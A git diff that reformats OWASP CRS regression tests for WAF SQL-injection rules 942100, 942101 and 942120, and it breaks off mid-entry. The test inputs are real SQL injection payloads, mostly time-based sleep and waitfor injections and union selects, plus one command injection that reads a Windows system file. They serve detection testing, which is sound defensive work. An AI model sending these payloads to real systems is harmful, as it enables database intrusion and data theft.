test_title: 942100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "1'||(select extractvalue(xmltype('%toyop;" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 11 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 12 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=unittests@coreruleset.org\" sleep(10.to_i) \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 13 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\" | type %SystemDrive%\\\\config.ini | \"" - version: HTTP/1.0 - output: - log_contains: id "942100" - - test_title: 942100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\" | type %SystemDrive%\\\\config.ini | \"" + version: HTTP/1.0 + output: + log_contains: id "942100" + - test_id: 14 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" - version: HTTP/1.0 - output: - log_contains: id "942100" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" + version: HTTP/1.0 + output: + log_contains: id "942100" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml index 37a054a9a..7237a3bc7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942101.yaml 
@@ -2,182 +2,170 @@ meta: author: "Christian Folini, Matteo Pace, azurit" description: Various SQL injection tests - enabled: true - name: 942101.yaml +rule_id: 942101 tests: - - test_title: 942101-1 + - test_id: 1 desc: "Simple SQL Injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/1234%20OR%201=1" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/1234%20OR%201=1" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 2 desc: "Basic SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/2010-01-01'+sleep(20.to_i)+'" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/2010-01-01'+sleep(20.to_i)+'" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 3 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - 
uri: "/post/EmptyValue'%20and%20526=527" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/EmptyValue'%20and%20526=527" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 4 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo')waitfor%20delay'5%3a0%3a20'--" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 5 desc: "Simple function call" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/sleep(20)" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/sleep(20)" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 6 desc: "Advanced SQL 
injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/unittests@coreruleset.org\"%20sleep(10.to_i)%20\"" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 7 desc: "SQL Injection at the last segment of the path (request_basename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 8 desc: "SQL Injection inside the path (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" - 
version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24'union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 9 desc: "SQL Injection inside the path with comment block (request_filename detection)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/%2A/%2A/2+union+all/bar" - version: HTTP/1.0 - output: - log_contains: id "942101" - - test_title: 942101-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/%2A/%2A/2+union+all/bar" + version: HTTP/1.0 + output: + log_contains: id "942101" + - test_id: 10 desc: "Negative test with incomplete SQL command inside the path" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/9'union+all/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" - - test_title: 942101-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/9'union+all/bar" + version: HTTP/1.0 + output: 
+ no_log_contains: id "942101" + - test_id: 11 desc: "Negative test with complete SQL command inside the path, but without comma" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" - version: HTTP/1.0 - output: - no_log_contains: id "942101" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/foo/24+union+all+select+1,2,3+from+aa/bar" + version: HTTP/1.0 + output: + no_log_contains: id "942101" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml index d6f008ecc..f3a5ec7b7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942120.yaml 
@@ -2,673 +2,631 @@ meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" description: None - enabled: true - name: 942120.yaml tests: - - test_title: 942120-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=blahblah&var2=LIKE%20NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=blahblah&var2=LIKE%20NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 2 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=RegExp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=RegExp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 3 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ">>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ">>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 4 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%26%26" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%26%26" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 5 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<<" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + 
uri: "/post" + data: "<<" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 6 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "%21%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "%21%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 7 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "||" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "||" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 8 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "XOR" - version: HTTP/1.0 - output: - log_contains: id 
"942120" - - test_title: 942120-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "XOR" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 9 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 10 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "IS NULL" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "IS NULL" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 11 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (0,1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (0,1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 12 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "in (2147483647,-1)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "in (2147483647,-1)" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 13 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=%3C%3D%3E" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" 
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=%3C%3D%3E" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 14 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "regexp" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "regexp" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 15 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "RLIKE" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RLIKE" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 16 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "<>" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "<>" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 17 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+in+%28++select+anfrage_id+from+erkenntnisse+where+id+is++not++null++%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 18 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815914%2C+815913%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815914%2C+815913%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 19 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "+IN+%28815919%2C+815920%2C+815921%2C+815922%2C+815923%2C+815924%2C+815925%2C+815926%2C+815927%2C+815928%2C+815929%2C+815930%2C+815932%2C+815933%2C+815934%2C+815935%2C+815936%2C+815937%2C+815917%2C+815918%29%0A" + version: HTTP/1.0 + output: + log_contains: id "942120" + - test_id: 20 desc: "SQL Injection Attack: SQL Operator Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay= in ( Aa,- Ab-, and Ac)" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" 
